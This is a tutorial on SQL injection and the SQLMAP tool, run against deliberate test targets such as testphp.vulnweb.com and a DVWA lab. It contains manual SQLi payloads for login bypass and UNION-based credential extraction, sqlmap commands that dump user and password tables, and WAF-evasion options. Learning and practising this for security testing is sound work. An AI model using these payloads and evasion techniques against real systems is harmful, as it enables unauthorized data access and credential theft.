SQL Injection Exploitation Made Easy: A Practical Guide to SQLMAP

Learn how to exploit SQL injection vulnerabilities using SQLMAP, an automated penetration testing tool for database security assessment.

Introduction

SQL Injection remains one of the most critical vulnerabilities in web applications, allowing attackers to manipulate backend databases. SQLMAP, an advanced penetration testing tool, automates the exploitation process, making database enumeration and extraction effortless. This guide will walk you through SQL Injection, its types, and SQLMAP’s powerful capabilities with real-world examples on test environments like TestVulnHub and DVWA.

SQL Injection Image generated by the Author

Index

1. What is SQL Injection?
2. SQL Injection Basics (with practical commands)
3. SQL Injection Types
4. SQLMAP Guide

• Basics about SQLMAP
• SQLMAP Command Reference Table
• Practical SQLMAP Commands (TestVulnHub)
• Practical SQLMAP Commands with Cookies (DVWA)

What is SQL Injection?

SQL Injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries a web application makes to its database. By injecting malicious SQL statements, an attacker can view, modify, or delete data and even gain administrative access.

SQL Injection Basics (with Practical Commands)

A basic SQL Injection attack involves injecting SQL queries via an application’s input fields. Below are common payloads used to test for SQL Injection:

1. Authentication Bypass:

This payload bypasses authentication mechanisms by always returning a true condition.

' OR 1=1 --

2. Identifying Number of Columns:

This helps identify how many columns exist in a database.

' ORDER BY 3 --

3. Extracting Database Version:

This retrieves the database version information.

' UNION SELECT NULL, @@version, NULL --

4. Retrieving Current Database:

This extracts the name of the current database in use.

' UNION SELECT NULL, database(), NULL --

5. Listing Usernames from a Table:

This retrieves stored usernames and passwords (if available in plaintext).

' UNION SELECT NULL, username, password FROM users --

6. Checking Database Users:

This retrieves the database users.

' UNION SELECT NULL, user FROM mysql.user --

7. Extracting Table Names:

This helps in enumerating available tables in the database.

' UNION SELECT NULL, table_name FROM information_schema.tables --

8. Extracting Column Names:

This reveals column names of a specific table.

' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' --

9. Extracting Data from a Specific Column:

This extracts usernames from the ‘users’ table.

' UNION SELECT username FROM users --

SQL Injection Types

1. In-band SQLi (Classic) — Uses the same communication channel to perform the attack and retrieve results. This includes Error-Based and Union-Based SQLi.
2. Inferential SQLi (Blind) — No direct database response; attacker infers information based on application behavior. This includes Boolean-Based and Time-Based SQLi.
3. Out-of-band SQLi — Uses different channels (like DNS or HTTP requests) to exfiltrate data when in-band methods are unavailable.
4. Error-Based SQLi — Extracts information through error messages.
5. Union-Based SQLi — Uses the UNION SQL operator to combine results.
6. Boolean-Based SQLi — Determines responses based on true/false conditions.
7. Time-Based SQLi — Uses time delays to infer database responses.

SQLMAP Guide:

SQLMAP Basics:

SQLMAP is an open-source penetration testing tool that automates SQL Injection detection and exploitation. It supports multiple injection techniques and database management systems (DBMS), including MySQL, PostgreSQL, and MSSQL.

SQLMAP Command Reference Table:

SQLMAP Commands

SQLMAP Test Case 1 {Basic} (TestVulnHub)

Below are practical SQLMAP commands executed on testphp.vulnweb.com:

1. Enumerate databases

This command retrieves the names of all databases available on the target system.

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 --dbs

From the Screenshot, we can see the database names as acuart and information_schema.

2. Enumerate tables from a specific database

This command lists all tables within the database acuart.

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart --tables

From the Screenshot, we can see the various table names.

3. Enumerate columns from a specific table

This command retrieves the column names from the users table in the acuart database.

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users --columns

From the Screenshot, we can see the various Column names.

4. Dump specific user data (username & password) from a table

This command extracts and displays usernames and passwords from the users table.

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users -C uname,pass --dump

From the Screenshot, we can see the the desired infomation.

SQLMAP Test Case 2 {Intermediate — Cookies} (DVWA)

Below are SQLMAP commands executed on DVWA using session cookies:

Cookies can be easily accessed via Right Click > Inspect > Storage > Cookies as shown in the Screenshot.

DVWA Cookies

1. Enumerate databases

This command retrieves all available databases while using an authenticated session.

sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID:XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" --dbs

2. Enumerate tables from a specific database

This command lists all tables in the dvwa database.

sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID:XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa --tables

3. Enumerate columns from a specific table:

This command displays column names in the users table of the dvwa database.

sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID:XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa -T users --columns

4. Dump specific user data (user ID & password) from a table

This command retrieves and displays user IDs and password hashes from the users table.

sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID:XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa -T users -C user_id,password --dump

SQLMAP Test Case 3 {Advanced} (Bypassing WAFs with SQLMAP)

Web Application Firewalls (WAFs) are designed to block SQL Injection attempts. However, SQLMAP offers various evasion techniques to bypass WAF protections.

1. Tamper Scripts:

SQLMAP includes multiple tamper scripts to obfuscate SQL payloads. Some useful ones include:

sqlmap -u "http://target.com/vuln.php?id=1" --tamper=space2comment,randomcase

Common tamper scripts:

• space2comment: Converts spaces to inline comments (/**/)
• randomcase: Randomizes uppercase/lowercase letters
• between: Replaces equal (=) signs with BETWEEN

2. Using Hex Encoding:

This encodes payloads in hexadecimal to evade signature-based detection.

sqlmap -u "http://target.com/vuln.php?id=1" --hex

3. Changing User-Agent and Referer Headers:

This helps avoid WAFs that block automated scanners.

sqlmap -u "http://target.com/vuln.php?id=1" --user-agent="Mozilla/5.0" --referer="http://google.com"

4. Custom Injection Points:

Using * as a wildcard helps SQLMAP inject payloads at different points.

sqlmap -u "http://target.com/vuln.php?id=1*" --dbs

Conclusion

SQLMAP is an essential tool for security professionals and penetration testers, enabling efficient exploitation of SQL Injection vulnerabilities. Understanding its commands and capabilities ensures thorough database security assessments. Always test in legal environments and use SQLMAP responsibly to strengthen cybersecurity defenses.

Happy Hacking! 🔥